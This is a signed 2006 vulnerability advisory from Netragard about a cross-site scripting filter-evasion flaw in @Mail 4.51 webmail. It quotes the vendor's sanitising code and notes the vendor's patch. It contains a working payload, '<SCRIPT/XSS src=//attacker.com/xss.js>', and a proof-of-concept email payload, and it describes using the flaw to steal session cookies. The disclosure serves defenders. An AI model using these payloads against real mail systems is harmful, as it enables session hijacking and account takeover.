-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard,  L.L.C  Advisory* *******************

      
                     Strategic Reconnaissance Team

              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."





[POSTING NOTICE]
- ----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

<a href=http://www.netragard.com/html/recent_research.html>
Netragard Research
</a>





[About Netragard]
- ----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools.  This advisory is the
product of research done by the Strategic Reconnaissance Team.





[Advisory Information]
- ----------------------------------------------------------------------
Contact        : Adriel T. Desautels
Researcher      : Philippe C. Caturegli
Advisory ID      : NETRAGARD-20061206
Product Name      : @ Mail
Product Version      : 4.51
Vendor Name      : Calacode
Type of Vulnerability    : XSS with filter evasion technique.
Effort        : Easy

- ----------------------------------------------------------------------
Netragard Security Note:

Source code obfuscation does not reduce the risk profile of any
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques.





[Product Description]
- ----------------------------------------------------------------------
"@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device."


- --http://www.atmail.com--





[Technical Summary]
- ----------------------------------------------------------------------
@Mail does not properly sanitize email. While @Mail does pre-append
a <DEFANGED_ tag to detected HTML tags, it does not properly detect
<SCRIPT/XSS> tags. This failure makes @Mail vulnerable to Cross-site
Scripting Attacks ("XSS") via filter evasion.





[Technical Details]
- ----------------------------------------------------------------------
@Mail renders HTML emails by default. (Note: we did not find a way to
disable this feature.) The emails that are received are parsed by the
following code located in Global.pm which disarms basic XSS attacks.





- -------8<------- SNIP Global.pm line 626 -> 635 SNIP -------8<-------
my ( $I1I11I11I11IIIII, $I1I111I1111II1II );$_ =
$I1111II1II1II1II->II1II1I11IIII111($I1I1II1II1I11II1);if (/</)
{s/<(META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY)(\s|>)/<DEFANGED_$1$2/gi;
s/On(Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|KeyUp|
Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|Resize|Select|Submit|
Unload)/DEFANGED_On$1/gi;
}if (/["\047][^"\047\s]*&#x?[1-9][0-9a-f]/i) {while (
/["\047][^"\047\s]*&#((4[6-9]|5[0-8]|6[4-9]|[78][0-9]|9[07-9]|1[0-1][0-9]|12[0-2]))/
)
{$I1I111I1111II1II = chr($1);s/&#$1;?/$I1I111I1111II1II/g;
}while (
/["\047][^"\047\s]*&#(x(2[ef]|3[0-9a]|4[0-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]))/i
)
{$I1I111I1111II1II = chr( hex("0$1") );s/&#$1;?/$I1I111I1111II1II/gi;
- -------8<------- SNIP Global.pm line 626 -> 635 SNIP -------8<-------

The above code will replace <SCRIPT> with <DEFANGED_SCRIPT>, but the
security created by the filtering process can be defeated. This is
because most web browsers assume that non-alpha-non-digit characters
are invalid after an HTML keyword and as such they are treated as
white-space. An attacker can use this knowledge to attack @Mail users.

Example:

"\s" matches any white space character (space and tab, as
well as \n and \r characters). "<SCRIPT>" is defanged by the
above sanitization however "<SCRIPT/XSS>" is not.

When "<SCRIPT/XSS>" hits a web browser it is translated back into
"<SCRIPT>" and executed by the browser. the "/XSS" becomes whitespace
to the browser. This is a very common filter evasion technique.


The following code "<SCRIPT/XSS src=//attacker.com/xss.js></SCRIPT>"
will then be executed when rendering an email with @Mail Webmail.

Please note that the email parser will also replace http:// by a <a
href=..., breaking up our XSS attack, but most browser will resolve
"//" as "http://" in script tags (verified in IE and Firefox)

This XSS attack will allow the attacker to retrieve the victim cookie
and impersonate the victime by replacing the sessionID in his own
cookie (verified)





[Proof Of Concept]
- ----------------------------------------------------------------------
Send an HTML email to an @Mail user with the following code embedded.

<SCRIPT/XSS src=//www.netragard.com/xss.js></SCRIPT>

*** The code above will display an alert if vulnerable ***

Note:
Netragard's Strategic Reconnaissance Team was able to use this issue
to hijack an @Mail users session.





[Vendor Status]
- ----------------------------------------------------------------------
Vendor Notified on 12/06/06
Vendor responded after 2 more notification attempts
Vendor issued a patch.
Vendor Comments (below):


"Just to confirm the first advisery you sent, NETRAGARD-20061206, has
already been fixed and included in the recent @Mail 4.61 patch for clients."






[Disclaimer]
- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFFirpEQwbn1P9Iaa0RAgp9AJ9ZmgNbMZVwsnxoCnWPODqlP2s7/gCbBoHK
omIwSA7xolFDZTq8ytPdDiw=
=B9c7
-----END PGP SIGNATURE-----